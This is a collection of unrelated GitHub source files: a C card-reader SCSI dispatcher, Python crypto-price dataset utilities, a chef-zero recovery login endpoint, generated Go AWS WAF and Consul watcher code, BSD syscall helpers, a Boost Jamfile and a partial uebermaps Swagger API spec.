		result = test_unit_ready(srb, chip);
		break;

	case INQUIRY:
		result = inquiry(srb, chip);
		break;

	case READ_CAPACITY:
		result = read_capacity(srb, chip);
		break;

	case START_STOP:
		result = start_stop_unit(srb, chip);
		break;

	case ALLOW_MEDIUM_REMOVAL:
		result = allow_medium_removal(srb, chip);
		break;

	case REQUEST_SENSE:
		result = request_sense(srb, chip);
		break;

	case MODE_SENSE:
	case MODE_SENSE_10:
		result = mode_sense(srb, chip);
		break;

	case 0x23:
		/* 0x23 = READ FORMAT CAPACITIES (no symbolic constant here). */
		result = read_format_capacity(srb, chip);
		break;

	case VENDOR_CMND:
		result = vendor_cmnd(srb, chip);
		break;

	case MS_SP_CMND:
		result = ms_sp_cmnd(srb, chip);
		break;

#ifdef SUPPORT_CPRM
	case SD_PASS_THRU_MODE:
	case SD_EXECUTE_NO_DATA:
	case SD_EXECUTE_READ:
	case SD_EXECUTE_WRITE:
	case SD_GET_RSP:
	case SD_HW_RST:
		result = sd_extention_cmnd(srb, chip);
		break;
#endif

#ifdef SUPPORT_MAGIC_GATE
	case CMD_MSPRO_MG_RKEY:
		result = mg_report_key(srb, chip);
		break;

	case CMD_MSPRO_MG_SKEY:
		result = mg_send_key(srb, chip);
		break;
#endif

	case FORMAT_UNIT:
	case MODE_SELECT:
	case VERIFY:
		/* Accepted as no-ops for host compatibility. */
		result = TRANSPORT_GOOD;
		break;

	default:
		set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
		result = TRANSPORT_FAILED;
	}

	return result;
}
| {
"pile_set_name": "Github"
} |
Utilities for Network Time Protocol (NTP) support.
| {
"pile_set_name": "Github"
} |
# Standard library
import cPickle
import csv
import os
import time

# Third-party
import numpy as np
import pandas as pd

# Local modules
import data
import indicators as ind
import processlogs2 as pl2
#################
#
# MINMAX NORMALIZE
#
#################
def minmax(dataset, crt=False, std=False):
    """Remap every column of ``dataset`` linearly onto [-1, 1].

    Each column is rescaled independently using its own min/max.  A
    constant column (min == max) divides by zero and yields NaN/inf,
    matching the original behavior.

    Parameters
    ----------
    dataset : pandas.DataFrame
        Frame of (numeric) columns, presumably technical indicators.
    crt, std : bool
        Placeholders for selectively skipping CRT/STD columns; not
        implemented, kept only for interface compatibility.

    Returns
    -------
    pandas.DataFrame
        A new frame with the same columns in their original order.

    Note: the previous implementation dropped and re-joined each column,
    which was quadratic in the number of columns and moved every
    processed column to the end of the frame; assigning into a copy is
    faster and preserves column order without mutating the caller's frame.
    """
    imin, imax = -1, 1
    dataset = dataset.copy()
    for column in dataset.columns:
        A = dataset[column]
        dmin = np.min(A)
        dmax = np.max(A)
        dataset[column] = imin + (imax - imin) * (A - dmin) / (dmax - dmin)
    return dataset
#################
#
# GEN DS
#
#################
def gen_ds( dataset, forward, opts, type='CRT'):
    """Turn an indicator DataFrame into an (inputs, targets) pair.

    dataset : DataFrame holding LTC OHLC columns plus indicator columns;
              column names end with the suffix opts["time_str"]
    forward : number of periods ahead the target refers to; that many
              trailing rows (which have no target) are trimmed
    opts    : dict; only opts["time_str"] is read here
    type    : 'CRT'   -> target is the next-period 1-bar compound return
              'PRICE' -> target is the next close price
              NOTE(review): any other value leaves ``tgt`` unbound and
              raises NameError below — presumably never happens; confirm
              at call sites.

    Returns (dataset, tgt) with the OHLC columns removed from the inputs.
    """
    # trim leading NaN vals ... takes time to warm up the indicators
    dataset = cut_init_nans( dataset)
    # targets as compound returns
    if type == 'CRT':
        # generate ohlc so we can calculate n-forward CRTs
        ohlc = pd.DataFrame( {"open":dataset["LTC_open_%s"%opts["time_str"]],
                              "high":dataset["LTC_high_%s"%opts["time_str"]],
                              "low":dataset["LTC_low_%s"%opts["time_str"]],
                              "close": dataset["LTC_close_%s"%opts["time_str"]]},
                             index=dataset["LTC_open_%s"%opts["time_str"]].index)
        CRT_1 = ind.CRT( ohlc, 1)
        # move those forward CRTs back, so we can use them as target, correct predictions
        tgt = CRT_1.shift(-1)
    elif type == 'PRICE':
        # bring next price back so we can use it as target
        tgt = dataset["LTC_close_%s"%opts["time_str"]].shift(-1)
    tgt.name = 'tgt'
    # drop off OHLC data so raw prices don't leak into the inputs
    dataset = dataset.drop( [ "LTC_open_%s"%opts["time_str"],
                              "LTC_high_%s"%opts["time_str"],
                              "LTC_low_%s"%opts["time_str"],
                              "LTC_close_%s"%opts["time_str"] ], axis=1)
    # trim nans off end (the last `forward` rows have no future value)
    tgt = tgt.ix[:-1*forward]; dataset = dataset.ix[:-1*forward]
    # return
    return dataset, tgt
###########################
# CRT SINGLE
###########################
def crt_single(initial, final, n=1):
    """Per-period compound (log) return between two prices.

    initial : initial investment / starting price
    final   : final price
    n       : number of periods the move spans (default 1); the raw log
              return is divided by this so the result is per-period and
              comparable to the CRT columns produced elsewhere.

    Returns ``log(final / initial) / n``.
    """
    ratio = final / initial
    return np.log(ratio) / n
###########################
# TARGETS
###########################
def gen_target(dataset, N=1):
    """Build the N-period-ahead prediction target from ``dataset.close``.

    The close column (assumed to already hold percent changes, not
    normalized) is shifted back by N rows so that row t is aligned with
    the value at t+N.  The trailing N entries become NaN.
    """
    return dataset.close.shift(-N)
###########################
# TARGETS
###########################
def gen_target_crt(dataset, N=1):
    """Build an N-period compound-return target from ``dataset.close``.

    For N >= 0 the target at row t is the compound return from t to t+N;
    for N < 0 it is the return over the preceding |N| periods (between
    t+N and t).  The close column must hold raw prices.

    NOTE(review): crt_single's per-period divisor is left at its default
    of 1 regardless of N — presumably intentional; confirm.
    """
    shifted = dataset.close.shift(-1 * N)
    if N < 0:
        # looking backward: change between t+N (|N| periods ago) and t
        return crt_single(shifted, dataset.close)
    # looking forward: change between t and t+N
    return crt_single(dataset.close, shifted)
############################
# CUT_INIT_NANS
###########################
def cut_init_nans(dataset):
    """Trim warm-up NaN rows from the head of ``dataset``.

    Rolling indicators need time to warm up, so the first rows of the
    frame contain NaNs, which break backprop.  Everything before the
    first row with no NaN in any column is dropped; rows after that
    point are kept even if they contain NaNs (matching the original
    behavior).  If no fully populated row exists, the frame is returned
    unchanged.

    dataset : a pandas DataFrame

    Returns the dataset minus the leading incomplete rows.

    Note: replaces the original O(rows*cols) Python loop (which also
    relied on py2-only ``xrange`` and the deprecated ``.ix`` indexer)
    with a vectorized scan; also works for non-float columns, where
    per-element ``np.isnan`` would have raised.
    """
    complete = dataset.notnull().all(axis=1)
    if complete.any():
        first = int(np.argmax(complete.values))
        return dataset.iloc[first:]
    return dataset
############################
# SAVE_CSV
###########################
def save_csv(dataset_t, tgt, name=""):
    """Dump an input dataset and its targets to two CSV files for a
    MATLAB neural network.

    dataset_t : DataFrame used as input to the neural net
    tgt       : targets (correct values) used to train/evaluate the NN;
                rows may be scalars or ndarrays
    name      : basename for the output files ("<name>.dataset.csv" and
                "<name>.tgt.csv"); a timestamp is used when empty
    """
    if not name:
        name = str(time.time())

    with open('%s.dataset.csv' % name, 'wb') as fh:
        out = csv.writer(fh, delimiter=',', quotechar='"',
                         quoting=csv.QUOTE_NONE)
        out.writerows(dataset_t.values)

    with open('%s.tgt.csv' % name, 'wb') as fh:
        out = csv.writer(fh, delimiter=',', quotechar='"',
                         quoting=csv.QUOTE_NONE)
        # ndarray rows are written as-is; scalars are wrapped so each
        # target still occupies one CSV row
        if type(tgt.values[0]) is np.ndarray:
            rows = [v for v in tgt.values]
        else:
            rows = [[v] for v in tgt.values]
        out.writerows(rows)
###########################
# STORE_PICK
###########################
def store_pick(d):
    """Pickle a fully-loaded Data instance into the ``pickles`` directory.

    d : a Data class instance; its ``filename`` attribute is embedded in
        the output file name, which is prefixed with a timestamp.

    The file name has the form ``<timestamp>.d.<d.filename>.pickle``.
    """
    name = str(time.time()) + ".d." + d.filename + ".pickle"
    filename = os.path.realpath(os.path.join("pickles", name))
    # 'with' guarantees the handle is closed even if pickling fails;
    # binary mode is required for pickle data to be portable.
    with open(filename, "wb") as f:
        cPickle.dump(d, f)
###########################
# LOAD_PICK
###########################
def load_pick(filename):
    """Load a pickled Data instance from the ``pickles`` directory.

    filename : file name of the pickle (relative to ``pickles``)

    Returns the unpickled Data instance.
    """
    filename = os.path.realpath(os.path.join("pickles", filename))
    # 'with' guarantees the handle is closed even if unpickling fails;
    # binary mode matches how the pickle was written.
    with open(filename, "rb") as f:
        return cPickle.load(f)
| {
"pile_set_name": "Github"
} |
require "ffi_yajl" unless defined?(FFI_Yajl)
require_relative "../rest_base"

module ChefZero
  module Endpoints
    # /system_recovery
    #
    # Validates a username/password pair and returns the normalized user
    # record, but only for users that have recovery authentication enabled.
    class SystemRecoveryEndpoint < RestBase
      def post(request)
        credentials = FFI_Yajl::Parser.parse(request.body)
        name = credentials["username"]
        password = credentials["password"]

        raw_user = get_data(request, request.rest_path[0..-2] + ["users", name], :nil)
        raise RestErrorResponse.new(403, "Nonexistent user") unless raw_user

        user = FFI_Yajl::Parser.parse(raw_user)
        user = ChefData::DataNormalizer.normalize_user(user, name, ["username"], server.options[:osc_compat])

        unless user["recovery_authentication_enabled"]
          raise RestErrorResponse.new(403, "Only users with recovery_authentication_enabled=true may use /system_recovery to log in")
        end
        raise RestErrorResponse.new(401, "Incorrect password") if user["password"] != password

        json_response(200, user)
      end
    end
  end
end
| {
"pile_set_name": "Github"
} |
// Code generated by smithy-go-codegen DO NOT EDIT.
package waf
import (
"context"
awsmiddleware "github.com/aws/aws-sdk-go-v2/aws/middleware"
"github.com/aws/aws-sdk-go-v2/aws/retry"
"github.com/aws/aws-sdk-go-v2/aws/signer/v4"
"github.com/aws/aws-sdk-go-v2/service/waf/types"
smithy "github.com/awslabs/smithy-go"
"github.com/awslabs/smithy-go/middleware"
smithyhttp "github.com/awslabs/smithy-go/transport/http"
)
// This is AWS WAF Classic documentation. For more information, see AWS WAF Classic
// (https://docs.aws.amazon.com/waf/latest/developerguide/classic-waf-chapter.html)
// in the developer guide. For the latest version of AWS WAF, use the AWS WAFV2 API
// and see the AWS WAF Developer Guide
// (https://docs.aws.amazon.com/waf/latest/developerguide/waf-chapter.html). With
// the latest version, AWS WAF has a single set of endpoints for regional and
// global use. Creates an XssMatchSet (), which you use to allow, block, or count
// requests that contain cross-site scripting attacks in the specified part of web
// requests. AWS WAF searches for character sequences that are likely to be
// malicious strings. To create and configure an XssMatchSet, perform the following
// steps:
//
// * Use GetChangeToken () to get the change token that you provide in
// the ChangeToken parameter of a CreateXssMatchSet request.
//
// * Submit a
// CreateXssMatchSet request.
//
// * Use GetChangeToken to get the change token
// that you provide in the ChangeToken parameter of an UpdateXssMatchSet ()
// request.
//
// * Submit an UpdateXssMatchSet () request to specify the parts of
// web requests in which you want to allow, block, or count cross-site scripting
// attacks.
//
// For more information about how to use the AWS WAF API to allow or
// block HTTP requests, see the AWS WAF Developer Guide
// (https://docs.aws.amazon.com/waf/latest/developerguide/).
func (c *Client) CreateXssMatchSet(ctx context.Context, params *CreateXssMatchSetInput, optFns ...func(*Options)) (*CreateXssMatchSetOutput, error) {
	// Build a per-call middleware stack; optFns may override a copy of the
	// client options before the stack is assembled.
	stack := middleware.NewStack("CreateXssMatchSet", smithyhttp.NewStackRequest)
	options := c.options.Copy()
	for _, fn := range optFns {
		fn(&options)
	}
	// NOTE: this file is generated ("DO NOT EDIT"); the registration order
	// of the middlewares below is significant (serialization, endpoint
	// resolution, signing, retry, validation, ...).
	addawsAwsjson11_serdeOpCreateXssMatchSetMiddlewares(stack)
	awsmiddleware.AddRequestInvocationIDMiddleware(stack)
	smithyhttp.AddContentLengthMiddleware(stack)
	AddResolveEndpointMiddleware(stack, options)
	v4.AddComputePayloadSHA256Middleware(stack)
	retry.AddRetryMiddlewares(stack, options)
	addHTTPSignerV4Middleware(stack, options)
	awsmiddleware.AddAttemptClockSkewMiddleware(stack)
	addClientUserAgent(stack)
	smithyhttp.AddErrorCloseResponseBodyMiddleware(stack)
	smithyhttp.AddCloseResponseBodyMiddleware(stack)
	addOpCreateXssMatchSetValidationMiddleware(stack)
	stack.Initialize.Add(newServiceMetadataMiddleware_opCreateXssMatchSet(options.Region), middleware.Before)
	addRequestIDRetrieverMiddleware(stack)
	addResponseErrorMiddleware(stack)

	// Caller-supplied API options may further mutate the stack.
	for _, fn := range options.APIOptions {
		if err := fn(stack); err != nil {
			return nil, err
		}
	}
	handler := middleware.DecorateHandler(smithyhttp.NewClientHandler(options.HTTPClient), stack)
	result, metadata, err := handler.Handle(ctx, params)
	if err != nil {
		return nil, &smithy.OperationError{
			ServiceID:     ServiceID,
			OperationName: "CreateXssMatchSet",
			Err:           err,
		}
	}
	out := result.(*CreateXssMatchSetOutput)
	out.ResultMetadata = metadata
	return out, nil
}
// A request to create an XssMatchSet ().
type CreateXssMatchSetInput struct {
	// A friendly name or description for the XssMatchSet () that you're creating. You
	// can't change Name after you create the XssMatchSet.
	//
	// NOTE(review): presumably required by the service and enforced by the
	// operation's validation middleware; confirm in the generated validators.
	Name *string

	// The value returned by the most recent call to GetChangeToken ().
	ChangeToken *string
}
// The response to a CreateXssMatchSet request.
type CreateXssMatchSetOutput struct {
	// The ChangeToken that you used to submit the CreateXssMatchSet request. You can
	// also use this value to query the status of the request. For more information,
	// see GetChangeTokenStatus ().
	ChangeToken *string

	// An XssMatchSet ().
	XssMatchSet *types.XssMatchSet

	// Metadata pertaining to the operation's result.
	ResultMetadata middleware.Metadata
}
// addawsAwsjson11_serdeOpCreateXssMatchSetMiddlewares registers the
// generated AWS-JSON-1.1 serializer and deserializer for this operation.
func addawsAwsjson11_serdeOpCreateXssMatchSetMiddlewares(stack *middleware.Stack) {
	stack.Serialize.Add(&awsAwsjson11_serializeOpCreateXssMatchSet{}, middleware.After)
	stack.Deserialize.Add(&awsAwsjson11_deserializeOpCreateXssMatchSet{}, middleware.After)
}
// newServiceMetadataMiddleware_opCreateXssMatchSet supplies the signing
// region/name and operation name recorded on the request context.
func newServiceMetadataMiddleware_opCreateXssMatchSet(region string) awsmiddleware.RegisterServiceMetadata {
	return awsmiddleware.RegisterServiceMetadata{
		Region:        region,
		ServiceID:     ServiceID,
		SigningName:   "waf",
		OperationName: "CreateXssMatchSet",
	}
}
| {
"pile_set_name": "Github"
} |
package consulwatch
import (
"fmt"
"log"
"os"
consulapi "github.com/hashicorp/consul/api"
"github.com/hashicorp/consul/api/watch"
)
// ServiceWatcher wraps a Consul watch plan for a single service and
// delivers endpoint updates to a handler registered via Watch.
type ServiceWatcher struct {
	// ServiceName is the name of the Consul service being watched.
	ServiceName string

	// consul is the API client the watch plan runs against.
	consul *consulapi.Client
	// logger receives the watch plan's log output.
	logger *log.Logger
	// plan is the underlying blocking-query watch plan.
	plan *watch.Plan
}
// New builds a ServiceWatcher for the named service in the given
// datacenter.  When onlyHealthy is true only passing instances are
// reported.  A nil logger falls back to a stdout logger.  The returned
// watcher does nothing until Watch registers a handler and Start runs
// the plan.
func New(client *consulapi.Client, logger *log.Logger, datacenter string, service string, onlyHealthy bool) (*ServiceWatcher, error) {
	// NOTE [email protected], 2019-03-04
	// ======================================
	//
	// Technically we can watch on a specific "tag" for a Consul service. And in theory Consul via its CLI allows
	// watching multiple tags, however, the watch API only allows watching one specific tag which makes it kind of
	// useless unless you want to setup a watch per tag. The better approach and the reason the "tag" argument is not
	// supplied below is because it is conceptually simpler to post-process the array of Endpoints returned during a
	// watch and construct a map of tag names to an array of endpoints.
	plan, err := watch.Parse(map[string]interface{}{
		"type":        "service",
		"datacenter":  datacenter,
		"service":     service,
		"passingonly": onlyHealthy,
	})
	if err != nil {
		return nil, err
	}

	if logger == nil {
		logger = log.New(os.Stdout, "", log.LstdFlags)
	}

	return &ServiceWatcher{consul: client, logger: logger, ServiceName: service, plan: plan}, nil
}
// Watch registers the handler invoked each time the watch plan reports a
// change in the service's entries.  The handler receives the complete,
// current endpoint list, or an error when Consul returns an unexpected
// payload.  Watch only installs the handler; call Start to begin watching.
func (w *ServiceWatcher) Watch(handler func(endpoints Endpoints, err error)) {
	w.plan.HybridHandler = func(val watch.BlockingParamVal, raw interface{}) {
		endpoints := Endpoints{Service: w.ServiceName, Endpoints: []Endpoint{}}

		if raw == nil {
			handler(endpoints, fmt.Errorf("unexpected empty/nil response from consul"))
			return
		}

		v, ok := raw.([]*consulapi.ServiceEntry)
		if !ok {
			handler(endpoints, fmt.Errorf("unexpected raw type expected=%T, actual=%T", []*consulapi.ServiceEntry{}, raw))
			return
		}

		// Pre-size the slice for the known entry count.  (The original
		// re-created it with make([]Endpoint, 0), redundantly replacing
		// the empty slice assigned above.)
		endpoints.Endpoints = make([]Endpoint, 0, len(v))
		for _, item := range v {
			// Normalize a nil tag list to an empty one so consumers
			// never see nil.
			tags := make([]string, 0)
			if item.Service.Tags != nil {
				tags = item.Service.Tags
			}

			endpoints.Endpoints = append(endpoints.Endpoints, Endpoint{
				Service:  item.Service.Service,
				SystemID: fmt.Sprintf("consul::%s", item.Node.ID),
				ID:       item.Service.ID,
				Address:  item.Service.Address,
				Port:     item.Service.Port,
				Tags:     tags,
			})
		}

		handler(endpoints, nil)
	}
}
// Start runs the watch plan; it blocks until the plan fails or Stop is
// called, streaming plan output to the watcher's logger.
func (w *ServiceWatcher) Start() error {
	return w.plan.RunWithClientAndLogger(w.consul, w.logger)
}
// Stop terminates a running watch plan and unblocks Start.
func (w *ServiceWatcher) Stop() {
	w.plan.Stop()
}
| {
"pile_set_name": "Github"
} |
// Copyright 2009 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// +build amd64,dragonfly
package unix
import (
"syscall"
"unsafe"
)
// setTimespec packs seconds/nanoseconds into a Timespec
// (64-bit fields on dragonfly/amd64).
func setTimespec(sec, nsec int64) Timespec {
	return Timespec{Sec: sec, Nsec: nsec}
}

// setTimeval packs seconds/microseconds into a Timeval.
func setTimeval(sec, usec int64) Timeval {
	return Timeval{Sec: sec, Usec: usec}
}

// SetKevent initializes a Kevent_t with the target fd, filter and flags,
// converting to the kernel's field widths.
func SetKevent(k *Kevent_t, fd, mode, flags int) {
	k.Ident = uint64(fd)
	k.Filter = int16(mode)
	k.Flags = uint16(flags)
}

// SetLen sets the iovec buffer length.
func (iov *Iovec) SetLen(length int) {
	iov.Len = uint64(length)
}

// SetControllen sets the msghdr control-message buffer length.
func (msghdr *Msghdr) SetControllen(length int) {
	msghdr.Controllen = uint32(length)
}

// SetLen sets the cmsghdr length field.
func (cmsg *Cmsghdr) SetLen(length int) {
	cmsg.Len = uint32(length)
}
// sendfile wraps the DragonFly BSD sendfile(2) system call: it copies
// count bytes from infd (starting at *offset) to outfd and returns how
// many bytes were actually written, as reported by the kernel through
// the out-parameter.  NOTE(review): *offset is not advanced here —
// presumably the caller updates it; confirm against callers.
func sendfile(outfd int, infd int, offset *int64, count int) (written int, err error) {
	var writtenOut uint64 = 0
	_, _, e1 := Syscall9(SYS_SENDFILE, uintptr(infd), uintptr(outfd), uintptr(*offset), uintptr(count), 0, uintptr(unsafe.Pointer(&writtenOut)), 0, 0, 0)

	written = int(writtenOut)

	if e1 != 0 {
		err = e1
	}
	return
}

// Syscall9 issues a raw nine-argument system call; it is implemented in
// assembly elsewhere in this package (hence the body-less declaration).
func Syscall9(num, a1, a2, a3, a4, a5, a6, a7, a8, a9 uintptr) (r1, r2 uintptr, err syscall.Errno)
| {
"pile_set_name": "Github"
} |
# Boost.Ratio library documentation Jamfile ---------------------------------
#
# Copyright Vicente J. Botet Escriba 2010. Use, modification and
# distribution is subject to the Boost Software License, Version
# 1.0. (See accompanying file LICENSE_1_0.txt or copy at
# http://www.boost.org/LICENSE_1_0.txt)
#
# See http://www.boost.org for updates, documentation, and revision history.
#import doxygen ;
import quickbook ;
#doxygen autodoc
# :
# [ glob ../../../boost/chrono/*.hpp ]
# [ glob ../../../boost/chrono/allocators/*.hpp ]
# :
# <doxygen:param>EXTRACT_ALL=NO
# <doxygen:param>HIDE_UNDOC_MEMBERS=YES
# <doxygen:param>EXTRACT_PRIVATE=NO
# <doxygen:param>EXPAND_ONLY_PREDEF=YES
# <doxygen:param>PREDEFINED=BOOST_INTERPROCESS_DOXYGEN_INVOKED
# <xsl:param>"boost.doxygen.reftitle=Boost.Chrono Reference"
# ;
# Build the BoostBook XML from the QuickBook source.
xml ratio : ratio.qbk ;

# Standalone HTML/PDF documentation build for Boost.Ratio.
boostbook standalone
    :
        ratio
    :
        # HTML options first:
        # Use graphics not text for navigation:
        <xsl:param>navig.graphics=1
        # How far down we chunk nested sections, basically all of them:
        <xsl:param>chunk.section.depth=0
        # Don't put the first section on the same page as the TOC:
        <xsl:param>chunk.first.sections=1
        # How far down sections get TOC's
        <xsl:param>toc.section.depth=4
        # Max depth in each TOC:
        <xsl:param>toc.max.depth=2
        # How far down we go with TOC's
        <xsl:param>generate.section.toc.level=10
        # Path for links to Boost:
        <xsl:param>boost.root=../../../..
        # Path for libraries index:
        <xsl:param>boost.libraries=../../../../libs/libraries.htm
        # Use the main Boost stylesheet:
        <xsl:param>html.stylesheet=../../../../doc/src/boostbook.css

        # PDF Options:
        # TOC Generation: this is needed for FOP-0.9 and later:
        <xsl:param>fop1.extensions=0
        # Or enable this if you're using XEP:
        <xsl:param>xep.extensions=1
        # TOC generation: this is needed for FOP 0.2, but must not be set to zero for FOP-0.9!
        <xsl:param>fop.extensions=0
        # No indent on body text:
        <xsl:param>body.start.indent=0pt
        # Margin size:
        <xsl:param>page.margin.inner=0.5in
        # Margin size:
        <xsl:param>page.margin.outer=0.5in
        # Yes, we want graphics for admonishments:
        <xsl:param>admon.graphics=1
        # Set this one for PDF generation *only*:
        # the default PNG graphics are awful in PDF form,
        # so it is better to use SVGs instead:
        <format>pdf:<xsl:param>admon.graphics.extension=".svg"
        <format>pdf:<xsl:param>admon.graphics.path=$(boost-images)/
        <format>pdf:<xsl:param>boost.url.prefix=http://www.boost.org/doc/libs/release/libs/ratio/doc/html
    ;

# Optional rule to copy the generated PDF into this directory.
install pdfinstall : standalone/<format>pdf : <location>. <install-type>PDF ;
explicit pdfinstall ;

###############################################################################
# Targets used by the global Boost documentation build.
alias boostdoc
    : ratio
    :
    : #<dependency>autodoc
    : ;
explicit boostdoc ;
alias boostrelease ;
explicit boostrelease ;
| {
"pile_set_name": "Github"
} |
swagger: "2.0"
host: uebermaps.com
basePath: /api/v2
info:
contact:
name: uebermaps API Team
description: Enable people to store spots on public and private maps
termsOfService: https://uebermaps.com/terms/
title: uebermaps API endpoints
version: "2.0"
x-apisguru-categories:
- location
x-logo:
url: https://twitter.com/uebermaps/profile_image?size=original
x-origin:
- format: swagger
url: https://uebermaps.com/api/v2/apidocs
version: "2.0"
x-providerName: uebermaps.com
consumes:
- application/json
produces:
- application/json
paths:
/account:
patch:
description: Update account. Wrap map parameters in [user].
parameters:
- description: user attributes
in: body
name: user
required: false
schema:
$ref: "#/definitions/UserEditable"
responses:
"200":
description: Contains user data.
schema:
$ref: "#/definitions/User"
summary: Update account
tags:
- Account
"/attachments/{id}":
delete:
description: Delete attachment.
parameters:
- description: Attachment id
in: path
name: id
required: true
type: integer
responses:
"200":
description: Contains deleted attachment.
schema:
$ref: "#/definitions/Attachment"
summary: Delete attachment
tags:
- Attachments
/authentication:
post:
description: Sign in user. Wrap authentication parameters in [user].
parameters:
- description: user authentication attributes
in: body
name: user
required: true
schema:
$ref: "#/definitions/UserAuthentication"
responses:
"200":
description: Contains user data including authentication token for subsequent requests
schema:
$ref: "#/definitions/UserFullProfile"
summary: Sign in user
tags:
- Authentication
/collaborator_invitations:
get:
description: List your collaborator invitations.
responses:
"200":
description: Contains list of collaborator invitations.
schema:
items:
$ref: "#/definitions/CollaboratorInvitation"
type: array
summary: List your collaborator invitations
tags:
- CollaboratorInvitations
post:
description: Invite user to collaborate on map.
parameters:
- description: Supply map_id and either a comma separated list of user_ids or emails. Optionally you can provide a 'is_admin' parameter with 'true' or 'false' to give the invited users admin privileges.
in: body
name: body
schema:
$ref: "#/definitions/CollaboratorInvitationCreate"
responses:
"200":
description: Contains collaborator invitation data.
schema:
$ref: "#/definitions/CollaboratorInvitation"
summary: Invite user to collaborate on map
tags:
- CollaboratorInvitations
"/collaborator_invitations/{id}":
delete:
description: Delete collaborator invitation.
parameters:
- description: Collaborator invitation id
in: path
name: id
required: true
type: integer
responses:
"200":
description: Contains deleted collaborator invitation.
schema:
$ref: "#/definitions/CollaboratorInvitation"
summary: Delete collaborator invitation
tags:
- CollaboratorInvitations
get:
description: Show collaborator invitation
parameters:
- description: Collaborator invitation id
in: path
name: id
required: true
type: integer
responses:
"200":
description: Contains collaborator invitation data.
schema:
$ref: "#/definitions/CollaboratorInvitation"
summary: Show collaborator invitation
tags:
- CollaboratorInvitations
patch:
description: Accept collaborator invitation.
parameters:
- description: Collaborator invitation id
in: path
name: id
required: true
type: integer
responses:
"200":
description: Contains collaborator invitation data.
schema:
$ref: "#/definitions/CollaboratorInvitation"
      summary: Accept collaborator invitation
tags:
- CollaboratorInvitations
"/comments/{id}":
delete:
description: Delete comment.
parameters:
- description: Comment id
in: path
name: id
required: true
type: integer
responses:
"200":
description: Contains deleted comment.
schema:
$ref: "#/definitions/Comment"
summary: Delete comment
tags:
- Comments
patch:
description: Update comment. Wrap comment parameters in [comment].
parameters:
- description: Comment id
in: path
name: id
required: true
type: integer
- description: Comment attributes
in: body
name: comment
required: false
schema:
$ref: "#/definitions/CommentEditable"
responses:
"200":
description: Contains comment data
schema:
$ref: "#/definitions/Comment"
summary: Update comment
tags:
- Comments
/events:
get:
description: List your own events.
parameters:
- description: Begin of time range of event (ISO 8601 date format).
in: query
name: timeframe_start
required: false
type: string
- description: End of time range of event (ISO 8601 date format).
in: query
name: timeframe_end
required: false
type: string
        - description: "To refine your event index request to contain only events within a geographical box pass the following bounds parameters. E.g. to get events within 'Hamburg, St. Pauli': bounds[sw_lat]=53.54831449741324 bounds[sw_lon]=9.943227767944336 bounds[ne_lat]=53.5571103674878 bounds[ne_lon]=9.9776029586792"
in: query
name: bounds
required: false
type: string
responses:
"200":
description: Contains list of events.
schema:
items:
$ref: "#/definitions/Event"
type: array
summary: List your own events
tags:
- Events
"/events/{id}":
delete:
description: Delete event.
parameters:
- description: Event id
in: path
name: id
required: true
type: integer
responses:
"200":
description: Contains deleted event.
schema:
$ref: "#/definitions/Event"
summary: Delete event
tags:
- Events
get:
description: Get basic information about an event
parameters:
- description: Id of event
in: path
name: id
required: true
type: integer
responses:
"200":
description: Contains event data.
schema:
$ref: "#/definitions/Event"
summary: Get event
tags:
- Events
patch:
description: Update event. Wrap event parameters in [event].
parameters:
- description: Event id
in: path
name: id
required: true
type: integer
- description: Event attributes
in: body
name: event
required: false
schema:
$ref: "#/definitions/EventEditable"
responses:
"200":
          description: Contains event data
          schema:
            $ref: "#/definitions/Event"
summary: Update event
tags:
- Events
/maps:
get:
description: List your own maps.
responses:
"200":
description: Contains list of maps.
schema:
items:
$ref: "#/definitions/Map"
type: array
summary: List your own maps
tags:
- Maps
post:
description: Create map. Wrap map parameters in [map]. To add a map header picture pass a base64 encoded string to [map][picture].
parameters:
- description: map attributes
in: body
name: map
required: false
schema:
$ref: "#/definitions/MapEditable"
responses:
"200":
description: Contains map data, map settings and your relation to this map
schema:
$ref: "#/definitions/Map"
summary: Create map
tags:
- Maps
/maps/search:
get:
description: Search maps
parameters:
- description: Query
in: query
name: q
type: string
- description: "Distance. Diameter of search radius in meter (default: 2000 meter)"
in: query
name: d
type: integer
- description: "Latitude for search radius (default distance: 2000 meter)"
in: query
name: lat
type: number
- description: "Longitude for search radius (default distance: 2000 meter)"
in: query
name: lon
type: number
responses:
"200":
description: Contains map data.
schema:
$ref: "#/definitions/Map"
summary: Search maps
tags:
- Search
"/maps/{id}":
delete:
description: Delete map.
parameters:
- description: map id
in: path
name: id
required: true
type: integer
responses:
"200":
description: Contains deleted map.
schema:
$ref: "#/definitions/Map"
summary: Delete map
tags:
- Maps
get:
description: Get basic information about a map
parameters:
- description: Id of map
in: path
name: id
required: true
type: integer
responses:
"200":
description: Contains map data, map settings and your relation to this map
schema:
$ref: "#/definitions/MapWithRelation"
summary: Get map
tags:
- Maps
patch:
description: Update map. Wrap map parameters in [map]. To update the map header picture pass a base64 encoded string to [map][picture].
parameters:
- description: map id
in: path
name: id
required: true
type: integer
- description: map settings attributes
in: body
name: map
required: false
schema:
$ref: "#/definitions/MapEditable"
responses:
"200":
description: Contains map data, map settings and your relation to this map
schema:
$ref: "#/definitions/Map"
summary: Update map
tags:
- Maps
"/maps/{id}/attachments":
get:
description: List attachments for a given map.
parameters:
- description: Map id
in: path
name: id
required: true
type: integer
responses:
"200":
description: Contains list of attachments.
schema:
items:
$ref: "#/definitions/Attachment"
type: array
summary: List attachments for a given map
tags:
- Attachments
post:
description: Upload map attachment. Wrap attachment parameters in [attachment]
parameters:
- description: Map id
in: path
name: id
required: true
type: integer
- description: Base64 encoded image
in: body
name: image
required: true
schema:
type: string
responses:
"200":
description: Contains attachment data
schema:
$ref: "#/definitions/Attachment"
summary: Upload map attachment
tags:
- Attachments
"/maps/{id}/collaborators/":
get:
description: List collaborators of a map.
parameters:
- description: Map id
in: path
name: id
required: true
type: integer
responses:
"200":
description: Contains list of collaborators.
schema:
items:
$ref: "#/definitions/Collaborator"
type: array
summary: List collaborators of a map
tags:
- Collaborators
"/maps/{id}/collaborators/{user_id}":
delete:
description: Delete collaboration.
parameters:
- description: map id
in: path
name: id
required: true
type: integer
- description: user id
in: path
name: user_id
required: true
type: integer
responses:
"200":
description: Contains deleted collaborator.
schema:
$ref: "#/definitions/Collaborator"
summary: Delete collaboration
tags:
- Collaborators
patch:
description: Update collaborator. Wrap collaborator parameters in [collaborator]
parameters:
- description: map id
in: path
name: id
required: true
type: integer
- description: user id
in: path
name: user_id
required: true
type: integer
